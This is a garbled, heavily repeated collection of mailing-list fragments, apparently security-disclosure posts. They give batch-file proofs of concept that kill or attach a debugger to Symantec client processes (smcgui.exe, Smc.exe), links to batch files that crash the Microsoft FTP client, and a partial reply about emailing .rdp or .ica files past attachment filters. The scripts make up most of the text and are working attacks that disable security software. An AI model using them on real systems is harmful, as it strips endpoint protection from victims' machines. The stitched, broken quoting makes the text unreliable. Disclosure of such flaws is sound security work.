Privilege Escalation attack
POC:
::Save the following as a batch file and execute it.
:here
taskkill /im smcgui.exe /f
goto :here
Now since the smcgui.exe is running in the user account, It will not be
> Privilege Escalation attack
>
> POC:
>
> ::Save the following as a batch file and execute it.
> :here
> taskkill /im smcgui.exe /f
> goto :here
>
> Now since the smcgui.exe is running in the user account, It will not be
POC:
::Save the following as a batch file and execute it.
:here
taskkill /im smcgui.exe /f
>> drwtsn32 -p %pid%
>> where pid is the process id for smc.exe
>>
>> POC:
>>
>> Save the following as a batch file and execute it
>>
>> tasklist | find /i "Smc.exe" > c:\pid.txt
>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>> drwtsn32 -p %pidopt%
>>
RS> Demonstration:
RS> Note: Demonstration leads to crashing of Microsoft FTP
RS> Client
RS> Download POC rename to .bat file and execute anyone of
RS> the batch file
RS> http://www.xdisclose.com/poc/mget.bat.txt
RS> http://www.xdisclose.com/poc/username.bat.txt
RS> http://www.xdisclose.com/poc/directory.bat.txt
RS> http://www.xdisclose.com/poc/list.bat.txt
>>> drwtsn32 -p %pid%
>>> where pid is the process id for smc.exe
>>>
>>> POC:
>>>
>>> Save the following as a batch file and execute it
>>>
>>> tasklist | find /i "Smc.exe" > c:\pid.txt
>>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>>> drwtsn32 -p %pidopt%
>>>
>>>> drwtsn32 -p %pid%
>>>> where pid is the process id for smc.exe
>>>>
>>>> POC:
>>>>
>>>> Save the following as a batch file and execute it
>>>>
>>>> tasklist | find /i "Smc.exe" > c:\pid.txt
>>>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>>>> drwtsn32 -p %pidopt%
>>>>
> drwtsn32 -p %pid%
> where pid is the process id for smc.exe
>
> POC:
>
> Save the following as a batch file and execute it
>
> tasklist | find /i "Smc.exe" > c:\pid.txt
> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
> drwtsn32 -p %pidopt%
>
Demonstration:
Note: Demonstration leads to crashing of Microsoft FTP
Client
Download POC rename to .bat file and execute anyone of
the batch file
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt
>>> drwtsn32 -p %pid%
>>> where pid is the process id for smc.exe
>>>
>>> POC:
>>>
>>> Save the following as a batch file and execute it
>>>
>>> tasklist | find /i "Smc.exe" > c:\pid.txt
>>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>>> drwtsn32 -p %pidopt%
>>>
drwtsn32 -p %pid%
where pid is the process id for smc.exe
POC:
Save the following as a batch file and execute it
tasklist | find /i "Smc.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
Steve,
try to email someone from your company a batch file. i am sure that
that will fail, mainly because you realize that it is a security risk.
right? now try to email a .rdp or .ica file. it works 99% of all the
time.
second, please read the article. :) no offense, but you are completely
missing the point here. 3rd, users does not need to have admin rights,
these rights can be obtained with privilege escalations exercise. this
